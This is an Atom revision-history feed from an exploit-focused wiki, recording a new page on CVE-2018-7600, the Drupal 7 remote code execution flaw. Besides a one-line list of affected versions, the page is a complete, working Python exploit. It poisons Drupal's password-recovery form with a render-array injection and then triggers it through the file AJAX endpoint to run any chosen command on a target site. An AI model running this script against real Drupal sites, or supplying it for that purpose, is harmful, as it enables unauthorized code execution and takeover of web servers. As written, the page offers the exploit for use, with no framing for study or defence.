<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-7600_Drupal%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2018-7600 Drupal遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-7600_Drupal%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-7600_Drupal%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-14T14:42:59Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2018-7600_Drupal%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2741&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==影響版本== DRUPAL 7 &lt;= 7.57   ==EXP== &lt;pre&gt; #!/usr/bin/env python3  import requests import argparse from bs4 import BeautifulSoup  def get_args():   parser = argparse.Ar...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-7600_Drupal%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2741&amp;oldid=prev"/>
		<updated>2021-05-08T09:01:05Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==影響版本== DRUPAL 7 &amp;lt;= 7.57   ==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/env python3  import requests import argparse from bs4 import BeautifulSoup  def get_args():   parser = argparse.Ar...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==影響版本==&lt;br /&gt;
DRUPAL 7 &amp;lt;= 7.57&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/env python3&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
import argparse&lt;br /&gt;
from bs4 import BeautifulSoup&lt;br /&gt;
&lt;br /&gt;
def get_args():&lt;br /&gt;
  parser = argparse.ArgumentParser( prog=&amp;quot;drupa7-CVE-2018-7600.py&amp;quot;,&lt;br /&gt;
                    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),&lt;br /&gt;
                    epilog= '''&lt;br /&gt;
                    This script will exploit the (CVE-2018-7600) vulnerability in Drupal 7 &amp;lt;= 7.57&lt;br /&gt;
                    by poisoning the recover password form (user/password) and triggering it with&lt;br /&gt;
                    the upload file via ajax (/file/ajax).&lt;br /&gt;
                    ''')&lt;br /&gt;
  parser.add_argument(&amp;quot;target&amp;quot;, help=&amp;quot;URL of target Drupal site (ex: http://target.com/)&amp;quot;)&lt;br /&gt;
  parser.add_argument(&amp;quot;-c&amp;quot;, &amp;quot;--command&amp;quot;, default=&amp;quot;id&amp;quot;, help=&amp;quot;Command to execute (default = id)&amp;quot;)&lt;br /&gt;
  parser.add_argument(&amp;quot;-f&amp;quot;, &amp;quot;--function&amp;quot;, default=&amp;quot;passthru&amp;quot;, help=&amp;quot;Function to use as attack vector (default = passthru)&amp;quot;)&lt;br /&gt;
  parser.add_argument(&amp;quot;-p&amp;quot;, &amp;quot;--proxy&amp;quot;, default=&amp;quot;&amp;quot;, help=&amp;quot;Configure a proxy in the format http://127.0.0.1:8080/ (default = none)&amp;quot;)&lt;br /&gt;
  args = parser.parse_args()&lt;br /&gt;
  return args&lt;br /&gt;
&lt;br /&gt;
def pwn_target(target, function, command, proxy):&lt;br /&gt;
  requests.packages.urllib3.disable_warnings()&lt;br /&gt;
  proxies = {'http': proxy, 'https': proxy}&lt;br /&gt;
  print('[*] Poisoning a form and including it in cache.')&lt;br /&gt;
  get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command}&lt;br /&gt;
  post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}&lt;br /&gt;
  r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)&lt;br /&gt;
  soup = BeautifulSoup(r.text, &amp;quot;html.parser&amp;quot;)&lt;br /&gt;
  try:&lt;br /&gt;
    form = soup.find('form', {'id': 'user-pass'})&lt;br /&gt;
    form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')&lt;br /&gt;
    if form_build_id:&lt;br /&gt;
        print('[*] Poisoned form ID: ' + form_build_id)&lt;br /&gt;
        print('[*] Triggering exploit to execute: ' + command)&lt;br /&gt;
        get_params = {'q':'file/ajax/name/#value/' + form_build_id}&lt;br /&gt;
        post_params = {'form_build_id':form_build_id}&lt;br /&gt;
        r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)&lt;br /&gt;
        parsed_result = r.text.split('[{&amp;quot;command&amp;quot;:&amp;quot;settings&amp;quot;')[0]&lt;br /&gt;
        print(parsed_result)&lt;br /&gt;
  except:&lt;br /&gt;
    print(&amp;quot;ERROR: Something went wrong.&amp;quot;)&lt;br /&gt;
    raise&lt;br /&gt;
&lt;br /&gt;
def main():&lt;br /&gt;
  print ()&lt;br /&gt;
  print ('=============================================================================')&lt;br /&gt;
  print ('|          DRUPAL 7 &amp;lt;= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |')&lt;br /&gt;
  print ('|                              by pimps                                     |')&lt;br /&gt;
  print ('=============================================================================\n')&lt;br /&gt;
&lt;br /&gt;
  args = get_args() # get the cl args&lt;br /&gt;
  pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
  main()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>